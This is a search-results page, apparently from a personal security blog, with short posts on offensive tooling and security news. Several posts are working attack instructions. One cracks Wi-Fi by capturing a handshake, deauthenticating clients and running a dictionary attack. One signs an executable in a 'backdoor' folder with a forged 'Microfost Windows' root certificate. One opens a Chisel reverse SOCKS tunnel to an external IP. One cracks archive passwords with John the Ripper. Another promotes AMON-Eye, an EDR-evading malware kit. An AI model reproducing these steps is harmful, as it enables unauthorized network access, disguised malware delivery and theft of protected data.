top of page

Search Results

9 items found for ""

  • Use MacM1 Kali to crack wifi password (MacM1 Kali Crack WIFI)

    Pre-preparation: Install Parallel and Kali on Mac M1 Buy good wifi equipment: https://www.alfa.com.tw/collections/kali-linux-compatible The relevant instructions are as follows: View the network card name ip addr View wlan0 usage mode Iwconfig Enable monitoring mode airmon-ng start wlan0 Find the current wifi traffic information airodump-ng wlan0mon Save the collected packets as data and execute to obtain the four-way handshake verification packet airodump-ng -w data -c 6 --bssid A2:1C:EA:95:6B:91 wlan0mon Disconnect the connected device aireplay-ng --deauth 0 -a A2:1C:EA:95:6B:91 wlan0mon Use dictionary file to blast aircrack-ng data-w /usr/share/wordlists/rockyou.txt

  • Windows adds a digital signature to exe

    Generate a self-signed root certificate makecert -n "CN=Microfost Windows" -r -sv Root.pvk Root.cer This command uses the makecert tool to create a self-signed root certificate with the certificate name set to "Microfost Windows" and saves the private key to Root.pvk and the public certificate to Root.cer. Convert the certificate to a Software Distribution Certificate (SPC): Cert2Spc.exe Root.cer Root.spc Use the Cert2Spc tool to convert the certificate you just created into a software distribution certificate and save it to Root.spc Combine the private key and SPC into a PFX file: pvk2pfx.exe -pvk Root.pvk -pi timmy -spc Root.spc -pfx Root.,pfx -f Use the pvk2pfx tool to combine the private key (Root.pvk) and SPC (Root.spc) into a PFX file, set the password to "timmy", and save the result to Root.pfx. Add the certificate to the local computer's trusted root certificate store CertMgr.Exe -add -c Root.cer -s -r localmachine root Use the CertMgr tool to add the certificate Root.cer to the local computer's trusted root certificate storage Signing executable files using PFX files signtool.exe sign /f Root.pfx /p timmy C:\Users\qoo7972365\Desktop\backdoor\windows_amd_excel.exe Use the signtool tool and the PFX file just created (password is "timmy") to sign the specified executable file. Tools download address

  • AMON-Eye: Advanced Malware Toolkit

    Overview In today's digital world, cyber threats have become increasingly serious, and malware attacks have posed a huge threat to the data security of organizations and individuals. Cobaltstrike is a widely used red team tool, and its anti-virus and intrusion detection system (EDR) bypass capabilities make it one of the most elusive tools for adversaries. AMON-Eye is decompiled, modified, and developed based on Cobaltstrike. It combines different concepts and projects to further improve the attacker's stealth and operability. This article will explore the usage and main functions of AMON-Eye. 1. How to use AMON-Eye The use of AMON-Eye is relatively simple. The attacker only needs to run the AMON-Eye executable file on the victim's system to start the attack. This tool suite provides a simple and intuitive user interface, allowing the operator to easily perform various attack activities. AMON-Eye's main features EDR and Anti-Virus Bypass: AMON-Eye uses a range of techniques and methods designed to bypass detection by EDR and anti-virus solutions. This includes the use of encryption and compression techniques to obfuscate malicious code, as well as the use of anti-detection techniques to evade behavioral analysis and virus signatures. Attack modules: AMON-Eye has multiple built-in attack modules that can perform various attack activities, such as implanting backdoors, executing remote code, breaking system security restrictions, etc. Attackers can select and configure these modules as needed to achieve their attack goals. Remote Control and Command: AMON-Eye has remote control and command capabilities, enabling attackers to monitor and operate infected systems from a remote location. This allows attackers to flexibly control the course of attack activities while minimizing the risk of being detected and tracked. Detection evasion: AMON-Eye uses a variety of detection evasion techniques, such as module injection, code reorganization, and zombie processes, which can make malicious code more difficult to detect and block when running on the system. Conclusion AMON-Eye is a powerful malware toolkit that is modified and developed based on Cobaltstrike and combines the ideas of multiple technologies and projects. This toolkit is highly stealthy and operational, and attackers can use it to perform various advanced attack activities while bypassing the detection of EDR and anti-virus solutions. However, it should be emphasized that this article is for research and educational purposes only, and it is strictly prohibited to use AMON-Eye for any illegal activities, otherwise you will be held legally responsible. References AMON-Eye GitHub page: https://github.com/S3N4T0R-0X0/AMON-Eye

  • Gophish is the open source, free, enterprise phishing solution of choice

    In today's context of increasing cybersecurity awareness, fighting against phishing attacks has become increasingly important. Gophish is an open-source phishing simulation tool that can help companies and organizations conduct phishing attack tests and improve employees' cybersecurity awareness. This article will introduce Gophish software in detail, including installation methods, software instructions, advantages, and conclusions. 1. Software Description Gophish has the following core functions: Email templates: used to create email content and styles for simulated phishing attacks. Login Page Template: Used to create a login page for a simulated phishing attack. Mail server configuration: Set up the mail server used to send phishing emails. Recipient Groups: Group test objects for easier management and analysis. Run a simulated phishing attack: Select the appropriate email template, login page template, mail server configuration, and recipient groups to start a simulated phishing attack. Data Analysis: Gophish collects data from attacks so that users can analyze and improve cybersecurity awareness training. 2. Advantages Open source and free: Gophish is an open source software, free for both commercial and individual users, reducing the cost of use for enterprises and organizations. Easy to use: Gophish has an intuitive interface that even beginners can quickly get started without the need for complex network security expertise. High security: Gophish is only used to simulate phishing attacks and does not involve actual network intrusion behavior, providing a secure network environment testing platform for enterprises and organizations. Data visualization: Gophish can display the data collected during the fishing test in the form of charts to help users intuitively understand the test results and security risks. High flexibility: Gophish supports custom email templates and login page templates. Users can conduct tests according to their own needs to improve the targetedness of the test. 3. Conclusion As an open-source phishing simulation tool, Gophish has become an important choice for enterprises and organizations to enhance their network security awareness due to its ease of use, security, and flexibility. By using Gophish to simulate phishing attack tests, enterprises and organizations can promptly discover potential security risks and take effective preventive measures to ensure network security. Practical application case teaching

  • Confluence CVE-2022-26134 Vulnerability Analysis

    Overview: Confluence is a knowledge management system commonly used by enterprises. It was recently found to have a security vulnerability CVE-2022-26134. This vulnerability allows attackers to remotely invade the affected system, resulting in data leakage or modification. Impact Analysis: The vulnerability affects Confluence Server and Data Center versions 7.4.0 to 7.11.6, 7.12.0 to 7.12.5, 7.13.0 to 7.13.6, 7.14.0 to 7.14.4, 7.15.0 to 7.15.3, and 7.16.0 to 7.16.2. Attackers exploit this vulnerability through improper input validation in an editor function. Once attackers successfully exploit the vulnerability, they can perform any actions on the target system, including but not limited to stealing sensitive data, modifying data, creating new accounts, etc. Repair suggestions: Atlassian has confirmed the existence of this vulnerability and released a patch to fix the affected versions. It is recommended that users of Confluence should upgrade to the latest version immediately to protect their systems from attacks. In addition to upgrading, it is also recommended to take other measures to protect the system, such as limiting access to Confluence, using a firewall, enabling multi-factor authentication, etc. Most importantly, pay attention to the latest security vulnerability news so that you can take timely actions to protect your data and systems. Related Videos: https://www.youtube.com/watch?v=wNt0JyfgS5Q

  • Chisel secure tunneling tool

    introduce Chisel is an open source tool for creating secure tunnels over HTTP(S) connections. It uses a client-server architecture to establish a tunnel between two endpoints so that traffic can pass securely. Chisel is lightweight and easy to use. working principle Chisel works by creating a client-server connection over HTTP(S). The client is a small binary file running on the local system, and the server is a web server that can be hosted anywhere. The client establishes a connection to the server over HTTP(S) and then sends a request to create a tunnel to the server. Once the tunnel is established, all traffic between the client and server is encrypted and sent through the tunnel. This means that even if an attacker intercepts the traffic, they will not be able to read it. The server acts as a proxy, forwarding traffic between the client and the target endpoint. Verification method Supports multiple authentication methods to ensure that only authorized clients can establish a connection. By default, Chisel uses a shared key for client authentication. The client must provide the correct key when establishing a connection, otherwise the connection will be rejected. HTTPS Verification Chisel can also be configured to use SSL/TLS for additional security. When SSL/TLS is enabled, Chisel will use self-signed certificates by default. However, users can provide their own certificates for additional security. Server chisel server -p 443 --reverse Client chisel client 35.236.161.97:443 R:socks

  • John the Ripper Jumbo

    git clone https://github.com/openwall/john.git Installation code required packages sudo apt-get update sudo apt-get install libssl-dev sudo apt-get install build-essential sudo apt-get install libbz2-dev Enter src to start compiling and installing cd john/src Compile to enable gpu ./configure --enable-opencl make -s clean && make -sj4 Check how many GPUs and CPUs John can use ./john --list=opencl-devices Using 4CPU 8RAM cracking speed, it takes 103 hours to crack five lowercase English numbers Using 4 Tesla T4 GPUs, it only takes 10 hours to crack five lowercase English numbers, which is 10 times faster (the size of this 7z file is about 1G) Decompress zip archives ~/john/run/john --format=zip-opencl --mask=[mycharset.chr] --min-length=1 --max-length=12 solomon_hash.txt --devices=2,3,4,5 --fork=4 Crack 7z compressed files perl 7z2john.pl ~/japan.7z > japan7zhash.txt If you encounter the following error, it means that the Compress::Raw::Lzma module is missing Can't locate Compress/Raw/Lzma.pm in @INC (you may need to install the Compress::Raw::Lzma module) (@INC contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.32.1 /usr/local/share/perl/5.32.1 /usr/lib/x86_64-linux-gnu/perl5/5.32 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.32 /usr/share/perl/5.32 /usr/local/lib/site_perl) at 7z2john.pl line 6. BEGIN failed -- compilation aborted at 7z2john.pl line 6. You need to run the following command to install the missing package: sudo apt-get install liblzma-dev sudo cpan Compress::Raw::Lzma ~/john/run/john --format=7z-opencl --mask=[mycharset.chr] --min-length=1 --max-length=8 /home/qoo7972365/japan7zhash.txt --devices=1,2,3,4 --fork=4 ./john/run/john --mask=tim my?l?l?l?l?l --min-length=10 --max-length=10 japan7zhash.txt

  • Five years to zero trust: Pentagon has ‘no choice’ but to sprint toward network goals

    “I can tell you at DoD, we’re taking this very seriously,” DoD CIO John Sherman said. “And we are committed to implementing zero trust at scale for our four-million-person-plus enterprise that we lead.” WASHINGTON — The Pentagon’s chief information officer is committed to implementing a zero trust architecture across the entire department in the next five years and will be releasing a new strategy to get there as soon as next month. “What we’re aiming for is by 2027 to have zero trust deployed across a majority of our enterprise systems in the Department of Defense,” DoD CIO John Sherman said at a FedTalks conference Wednesday. “Five years. That’s an ambitious goal… but the adversary capability we’re facing leaves us no choice but to move at that level of pace.” To get after its zero trust goals, the Pentagon plans to release a new strategy as soon as next month. The strategy will define DoD’s approach to zero trust between the “main controls” to the most sensitive systems. Sherman said that within the last month, he also hired a new deputy chief information security officer to bolster the office’s efforts. “I can tell you at DoD, we’re taking this very seriously,” he said. “And we are committed to implementing zero trust at scale for our four-million-person-plus enterprise that we lead.” RELATED: Pentagon CIO Hopes CMMC 2.0 Will ‘Raise’ Cybersecurity ‘Waterline’ photo credit: Intelligent and National Security Alliance Source: Five years to zero trust: Pentagon has ‘no choice’ but to sprint toward network goals

  • A Perfect Storm: 7 Reasons Global Attacks Will Soar in 2023

    In 2023, the global annual cost of cyber crime is predicted to top $8 trillion, according to a recent Cybersecurity Ventures report. This seemingly enormous figure might still be a major underestimate. In 2021, U.S. financial institutions lost nearly $1.2 billion in costs due to ransomware attacks alone. That was a nearly 200% increase over the previous year. If we continue at that rate, next year could see global costs approaching $16 trillion. Why might costs be so high? Here are seven reasons why cyberattack rates and costs will rise dramatically in 2023. Reason 1: The Economy The Cybersecurity Venture report correctly identified the talent crunch as a reason for concern. But the problem has even deeper roots. The worldwide economic outlook continues to face stiff headwinds. Inflation, the energy crisis and supply chain issues are affecting every industry. Inflation will increase the overall cost of cyber crime as preventive and remediation costs rise. While inflation is not directly related to the number of incidents, it does impact company budget decisions. In response, some of the biggest tech brands are reducing headcounts and implementing hiring freezes. Meanwhile, security teams have been stretched thin for years. If security budgets don’t rise with inflation, security leaders will have even less buying power to implement strong security and capable teams. Reason 2: Malware-as-a-Service Ransomware has plagued businesses, governments, individuals and organizations in nearly every sector. Now it’s easier than ever for threat actors to access powerful ransomware tools. Even with modest technical skills, criminals can launch attacks that can cost companies millions. Ransomware and other malware can be purchased for as little as $66. You can even get a phishing kit for free on underground forums. Meanwhile, the global average cost of a data breach is $4.35 million. And the majority of targets are already victims of repeat attacks (83% have had more than one breach, as per IBM Cost of a Data Breach report). Since accessing malware services and kits has never been easier, attack rates are bound to rise substantially. Reason 3: Geopolitical Conflict In 2021, the Russia-based REvil Ransomware-as-a-Service group was responsible for nearly 18,000 attack attempts in the U.S. alone. Members of the group were also behind the Colonial Pipeline attack. The cyber gang claimed to rake in annual revenues of over $100 million. Some might forget it was the Russian government that eventually took down REvil. Reportedly, the takedown was part of a rare collaborative effort between the United States and Russia. Since the outbreak of the war in Ukraine, these kinds of collaborative efforts are less likely. The U.S. continues to increase cybersecurity collaborative efforts with friendly nations. But rising geopolitical tensions are already causing an increase in state-sponsored and politically driven attacks. Reason 4: Criminals Target Smaller Organizations While the big, high-profile breaches fill headlines, many intruders prefer to target smaller organizations. Between 2020-2021, cyberattacks on small companies surged by more than 150%, according to RiskRecon, a Mastercard company that evaluates companies’ security risk. The reasons behind this trend are twofold. For starters, smaller targets usually have weaker security. Also, high-profile targets like infrastructure or big corporations will likely attract a stronger law enforcement response. This means schools, local police departments, small government offices and businesses with less than 1,000 employees will continue to be attacked. Reason 5: Organizations Can’t Afford Cyber Insurance A recent report warns that the number of organizations with cyber insurance problems is set to double in 2023. They might be unable to afford cyber insurance, be declined coverage or experience significant coverage limitations. Forrester commented on the situation in their Top Cybersecurity Threats for 2022 report. The firm predicts that it is likely that insurers will include new underwriting requirements and greater scrutiny of risk mitigation and security program maturity. The cyber insurance crisis is not only an indicator of rising risk. It will also place further pressure on businesses on the financial side in the event of a breach. Reason 6: Rapidly Expanding Attack Surface In 2021 there were a total of 11.3 billion IoT devices worldwide. This number will likely reach 15.1 billion in 2023. Meanwhile, as of 2022, 26% of U.S. employees work remotely. Current estimates expect 36.2 million American employees to be working remotely by 2025. The first half of 2021 saw 1.5 billion attacks on smart devices, with attackers looking to steal sensitive data, cryptojack devices or build botnets. Intruders may even reach corporate assets from a device connected to a home network where remote work occurs. The attack surface has never been greater and continues to expand rapidly. This means threat actors have even more places to probe and attack. Reason 7: Hacktivism Rising The world continues to suffer from a wide variety of conflicts. In the geopolitical realm, pro-Ukraine or pro-Russian hackers launch attacks with political motives. We also see the rise of environmental hacktivists targeting mining and oil companies. According to one expert, hacktivism has become a mainstream force impacting millions of lives globally. “Hacking for a cause” incidents include the Democratic National Committee (DNC) email hack and the massive 2.6 TB Panama Papers leak. Hacktivism is a significant anti-establishment weapon promoting a diverse set of causes around the globe. And as street protests grow, online protests will grow as well. Get Ready for a Turbulent 2023 These indicators all point towards a significant rise in cyberattacks and associated costs for 2023. Efforts to stem the tide are underway from both the public and private sectors. Let’s hope the good guys soon gain the upper hand. Source: https://securityintelligence.com/articles/7-reasons-global-attacks-will-soar-2023/

bottom of page